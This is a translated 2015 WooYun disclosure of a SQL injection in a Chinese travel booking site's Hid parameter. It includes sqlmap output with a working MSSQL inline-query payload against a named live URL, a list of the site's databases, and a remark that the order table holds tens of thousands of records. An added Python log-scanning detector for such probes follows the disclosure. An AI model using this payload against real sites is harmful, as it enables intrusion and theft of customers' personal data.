
Vulnerability Summary

Defect ID: wooyun-2015-095890

Title: Meitrip (美程旅行网) has a SQL injection vulnerability leaking large amounts of sensitive user data

Vendor: Meitrip (美程旅行网)

Author: 中央军

Submitted: 2015-02-06 10:41

Fixed by: 2015-03-23 10:42

Published: 2015-03-23 10:42

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-02-06: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-03-23: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Meitrip (www.meitrip.cn, www.meitrip.com) was founded in 2003 and, after several years of development, has become a leading online travel service provider in China. In the spirit of "professional quality, attentive service", the company provides reliable, safe and comprehensive travel and business services to business travellers. It has not only resolved all kinds of travel and accommodation troubles for business travellers, but has also grown considerably and achieved good social and economic results. Going forward, Meitrip will keep improving its service system and business standards to offer business travellers better hotel reservation, discounted air ticket and travel information services.

Detailed description:

Meitrip (美程旅行网)

http://www.meitrip.cn

has a SQL injection; the affected location is:

http://www.meitrip.cn/private/GetGardenRoom.aspx?Hid=110602

The Hid parameter is injectable.

sqlmap identified the following injection points with a total of 69 HTTP(s) requests:
---
Place: GET
Parameter: Hid
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: Hid=(SELECT CHAR(113)+CHAR(106)+CHAR(115)+CHAR(119)+CHAR(113)+(SELECT (CASE WHEN (9450=9450) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(119)+CHAR(119)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
available databases [6]:
[*] master
[*] model
[*] msdb
[*] new_hotel
[*] new_hotel_old
[*] tempdb

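A detection check derived from the finding above, added here as an example (it is not part of the original report or of the vendor's code): the legitimate request carries a plain integer Hid, so any request to GetGardenRoom.aspx whose Hid is not an integer can be flagged from IIS W3C logs, and the sqlmap payload quoted above is the concrete case. The log field order and the sample log lines are assumptions constructed for this example.

```python
"""Flag SQL-injection probes against an integer-only parameter in IIS W3C logs.
Added example, not part of the original report; it assumes the field order below
and that GetGardenRoom.aspx only receives Hid as an integer (cf. Hid=110602).
"""
import re
from urllib.parse import parse_qs, quote

# Page -> parameters that must be plain integers (assumption from the report).
INTEGER_PARAMS = {"GetGardenRoom.aspx": {"Hid"}}
# Keywords from the report's sqlmap payload; only used to label an alert.
SQL_HINT = re.compile(r"\b(SELECT|CASE|WHEN|CHAR)\b", re.IGNORECASE)
# Assumed W3C field order for this example (a subset of the IIS log fields).
FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "c-ip", "sc-status"]
# Payload quoted in the report; URL-encoded below as it would appear in the log.
SQLMAP_PAYLOAD = ("(SELECT CHAR(113)+CHAR(106)+CHAR(115)+CHAR(119)+CHAR(113)"
                  "+(SELECT (CASE WHEN (9450=9450) THEN CHAR(49) ELSE CHAR(48) END))"
                  "+CHAR(113)+CHAR(118)+CHAR(119)+CHAR(119)+CHAR(113))")

# Constructed sample log: normal request, sqlmap request, quote probe, unrelated page.
SAMPLE_LOG = [
    "2015-02-05 03:12:44 10.0.0.5 GET /private/GetGardenRoom.aspx Hid=110602 198.51.100.7 200",
    "2015-02-05 03:12:51 10.0.0.5 GET /private/GetGardenRoom.aspx Hid="
    + quote(SQLMAP_PAYLOAD, safe="") + " 198.51.100.7 200",
    "2015-02-05 03:12:52 10.0.0.5 GET /private/GetGardenRoom.aspx Hid=110602%27 198.51.100.7 500",
    "2015-02-05 03:13:02 10.0.0.5 GET /search.aspx q=hotel%20guangzhou 203.0.113.9 200",
]

def check_request(stem, query):
    """Return (param, kind, decoded value) for each guarded value that is not an integer."""
    guarded = INTEGER_PARAMS.get(stem.rsplit("/", 1)[-1])
    if not guarded or query == "-":          # IIS logs '-' for an empty query string
        return []
    findings = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if name in guarded and not re.fullmatch(r"-?\d+", value):
                kind = "sql-injection" if SQL_HINT.search(value) else "non-integer"
                findings.append((name, kind, value))
    return findings

def scan(lines):
    """Parse W3C lines (skipping '#' directives) into alerts on guarded parameters."""
    alerts = []
    records = (dict(zip(FIELDS, l.split(" "))) for l in lines
               if not l.startswith("#") and l.count(" ") == len(FIELDS) - 1)
    for rec in records:
        for name, kind, value in check_request(rec["cs-uri-stem"], rec["cs-uri-query"]):
            alerts.append({"time": rec["date"] + " " + rec["time"], "client": rec["c-ip"],
                           "status": rec["sc-status"], "param": name, "kind": kind, "value": value})
    return alerts
```

Running scan(SAMPLE_LOG) yields two alerts from the same client: the sqlmap request labelled sql-injection and the trailing-quote probe labelled non-integer (the 500 status on the latter is the error-based tell that usually precedes automated exploitation).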

The new_hotel database:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: Hid
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: Hid=(SELECT CHAR(113)+CHAR(106)+CHAR(115)+CHAR(119)+CHAR(113)+(SELECT (CASE WHEN (9450=9450) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(119)+CHAR(119)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: new_hotel
[226 tables]


Let's pick a few fields from the OrderInfo table to take a look; there are tens of thousands of records:

[screenshot: 1.jpg]

Proof of vulnerability:

Fix recommendation:

Copyright: please credit the source when reposting: 中央军@乌云 (WooYun)


Vulnerability Response

Vendor response:

Vendor could not be contacted, or vendor actively refused the report